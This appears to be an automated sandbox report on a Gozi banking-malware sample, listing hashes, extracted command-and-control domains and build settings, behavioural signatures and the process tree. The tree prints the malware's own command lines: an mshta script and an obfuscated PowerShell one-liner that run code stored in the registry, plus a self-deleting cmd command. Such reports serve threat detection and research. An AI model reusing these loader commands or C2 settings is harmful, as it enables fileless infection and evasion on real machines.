Analysis
-
max time kernel
151s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11-10-2023 08:31
Static task
static1
Behavioral task
behavioral1
Sample
5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe
Resource
win7-20230831-en
General
-
Target
5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe
-
Size
267KB
-
MD5
5a84945991cf24c957cf67fd414c9f9a
-
SHA1
06206df47fd0805d616f31b5e56daa6378409e72
-
SHA256
5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587
-
SHA512
307f16d760c0adbeb829705e6db167c460c7d048da56049a8240c6cf6de69c2e6f41fcb9cca7c2e2ee03b8b5cbe8132f346fc3626c39e7f4de6c6d0cbfce2ed2
-
SSDEEP
6144:ZWO3FffE31kwsQODpAkVyakH7bWMxNTf:EOFf8lDsQsVyaOP5
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1680 cmd.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 2748 set thread context of 1280 2748 powershell.exe Explorer.EXE PID 1280 set thread context of 1680 1280 Explorer.EXE cmd.exe PID 1680 set thread context of 1976 1680 cmd.exe PING.EXE PID 1280 set thread context of 1112 1280 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 1976 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exepowershell.exeExplorer.EXEpid process 2144 5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe 2748 powershell.exe 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1280 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 2748 powershell.exe 1280 Explorer.EXE 1680 cmd.exe 1280 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2748 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 1280 Explorer.EXE -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 2924 wrote to memory of 2748 2924 mshta.exe powershell.exe PID 2924 wrote to memory of 2748 2924 mshta.exe powershell.exe PID 2924 wrote to memory of 2748 2924 mshta.exe powershell.exe PID 2748 wrote to memory of 1900 2748 powershell.exe csc.exe PID 2748 wrote to memory of 1900 2748 powershell.exe csc.exe PID 2748 wrote to memory of 1900 2748 powershell.exe csc.exe PID 1900 wrote to memory of 2844 1900 csc.exe cvtres.exe PID 1900 wrote to memory of 2844 1900 csc.exe cvtres.exe PID 1900 wrote to memory of 2844 1900 csc.exe cvtres.exe PID 2748 wrote to memory of 2896 2748 powershell.exe csc.exe PID 2748 wrote to memory of 2896 2748 powershell.exe csc.exe PID 2748 wrote to memory of 2896 2748 powershell.exe csc.exe PID 2896 wrote to memory of 764 2896 csc.exe cvtres.exe PID 2896 wrote to memory of 764 2896 csc.exe cvtres.exe PID 2896 wrote to memory of 764 2896 csc.exe cvtres.exe PID 2748 wrote to memory of 1280 2748 powershell.exe Explorer.EXE PID 2748 wrote to memory of 1280 2748 powershell.exe Explorer.EXE PID 2748 wrote to memory of 1280 2748 powershell.exe Explorer.EXE PID 1280 wrote to memory of 1680 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1680 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1680 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1680 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1680 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1680 1280 Explorer.EXE cmd.exe PID 1680 wrote to memory of 1976 1680 cmd.exe PING.EXE PID 1680 wrote to memory of 1976 1680 cmd.exe PING.EXE PID 1680 wrote to memory of 1976 1680 cmd.exe PING.EXE PID 1680 wrote to memory of 1976 1680 cmd.exe PING.EXE PID 1680 wrote to memory of 1976 1680 cmd.exe PING.EXE PID 1680 wrote to memory of 1976 1680 cmd.exe PING.EXE PID 1280 wrote to memory of 1112 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1112 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1112 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1112 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1112 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1112 1280 Explorer.EXE cmd.exe PID 1280 wrote to memory of 1112 1280 Explorer.EXE cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Users\Admin\AppData\Local\Temp\5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe"C:\Users\Admin\AppData\Local\Temp\5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2144 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Asji='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Asji).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\24F5F9D3-33BE-F6ED-DD98-178A614C3B5E\\\StopDiagram'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name blgorxiw -value gp; new-alias -name stgitclgt -value iex; stgitclgt ([System.Text.Encoding]::ASCII.GetString((blgorxiw "HKCU:Software\AppDataLow\Software\Microsoft\24F5F9D3-33BE-F6ED-DD98-178A614C3B5E").ListMail))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wh0gzywl.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES194C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC194B.tmp"5⤵PID:2844
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ozr-7xwv.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A07.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1A06.tmp"5⤵PID:764
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1976 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1112
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57e75388d7c0f010679b3be1b8470cb24
SHA151e68e86e4d647779a21a50758d0ea6f0a18eccb
SHA256a6f54b786f6319cea5ba15043f04235bc9d118750c7b085cf3a2bddfa5d2c13c
SHA51292da74a77f5c3e03f1fe78ac2805f6588279a632edc3d2ba36f4150a39f80df311b5707f5d8104c806584980b3d9da59e29159cfa7ed2e86b51efc2c8b828894
-
Filesize
1KB
MD57d608de7b4a00cb707198acdf5f7da18
SHA12d0921bc69d16c4cfb41a7f2d4c83d9a2bec29bb
SHA256c1fecb5ddc1c222567ea7e0735d2e0a04bef457f663bd8230cb9339628104154
SHA5120f65785619791205afe4a6e331abaf7613ecaedddb40b99cc45f5e4c625ef76b97194d8d0bc82e102cdabfdb13fec8dc77b7974c046dcea31c5bcdc87dec8ae9
-
Filesize
3KB
MD527f0bc5a8626dc8fbeb1a9ae11ffcaff
SHA1709da0ea488b54954e8171a59e9b640cb5c8a258
SHA25699e8e6bdac41bb386a54ecccaf605809c5fb30aa96467d91111e8cd5dffb1f14
SHA512e9f116280a0c36f5882a2bc7ccf9701bcefee52c59833046733680717d8d0e95be3285387fe697b38164b951fa9a194e33677de6ad863dac905fbbfdc2ff2a0e
-
Filesize
7KB
MD5bc6a03c1c873adf8becd47cc16188f58
SHA178ff4db49efab116c7d1851c67afeca073766702
SHA2560bc3cfcd568f6a3e1ba5d6c83036c6bd3565ac2980533debbd32f7e81b059dca
SHA5127a941982f9f61c342d4f8f5b9b435784c2ff84bb65a0fc20e21588b403b24b4c3cdfa0f646a911f8bedbb4467a0042a2229d8cfecdf0cec886691dcbd17a1659
-
Filesize
3KB
MD5ddb7bbfa4dea63ce378d1fbb9a81fb6e
SHA12706c02efe49ab8fbec72fd7609bede5864c659e
SHA256a82880a8488537c8b58917b0a799c9bd75419907b0e26a6640dbb8e507da0da6
SHA512e3378d903be6a596ae4947fe55f9d2ef6265dde09fc0afe98c24169b641d2f206a716cda7bc7f29a66c6302b5fb70841154da669383ced91d8c6c304daf3193c
-
Filesize
7KB
MD5077f5f8c4c04d550dac4bbcc2f391255
SHA1e19226dc522bde333d56cc2a6e28f555d66dc96c
SHA256ad9def87b2886f9f8341995f7354e35f81c6559ae51b9ca045be99138dc7ec7b
SHA512e5de8bf245b91e08a6e6ae1be261416e1d704daedd86925a4240acc0d14fb4433009fd0fb379e95b3489b551c812d443852dc4fe246b9513304673bf12a57aa9
-
Filesize
652B
MD5571c61c806a0c45c8ca90f58da372856
SHA1f1030112a24724295033ad4caa8d07d61f1a953a
SHA25672ceff97628641ff5efbe35307f40607164aea7306b26773c5ffb6e7b18aa054
SHA512a5551877b8dfa6d8788050bcdd21fa87dd385f0ca85286a684831512518521d4df7662b8fa69f8b31bcf43c55b8472456cf49d98b8ee9bd2b52d19f1ba697869
-
Filesize
652B
MD526b61d19e7b38ac385e275d0ee49cf44
SHA1c0af5295c8d75bdacda1e116eed879579b970def
SHA2568c24cc81fa1d028e2591d4dcf323b54fc13c7f4834911200c55688828059f198
SHA5124b1d7d8d9ab16cf37ddd439e00b7a420a3177bdcf90331b1fb0fda813f6722cd4b3c9316dc2b91d0c2e5470f1da00fa177b6bef9791e9908bf033c9d7cddfeed
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
309B
MD52d45a3b130df359241a5aa2916980cce
SHA1f1e425ad1be1d88a9f19eb37193a4c46334daf59
SHA256755a5961f4299068f381389acb22121a360ae334456d4eb9a6eb9b5e9b2f5d28
SHA51253542c9f24ef65342f905707de53ff08e52eb8387d2b7a5734ae4ed311855b6d2ee630501c12860698bfbf6c2213c2c2203145a94ca6a953e6dbdb3f816492bc
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
309B
MD55176e2b9da0795932f5cabda05c42f82
SHA1cd2feee8f639c4d6d4fa0048c4dca08218b989f4
SHA2561638b0455d81ce3f6e4a46dffee67e3dc8d3534fa55dc2710757ae81dae203f2
SHA51297774876fe4c92f97568061c98eb5d34f5ac3086f12512924d4d94d25adff5723167c83a132b64645e93cb0439422a3afc025ec96eede935fcefb237606d9e4e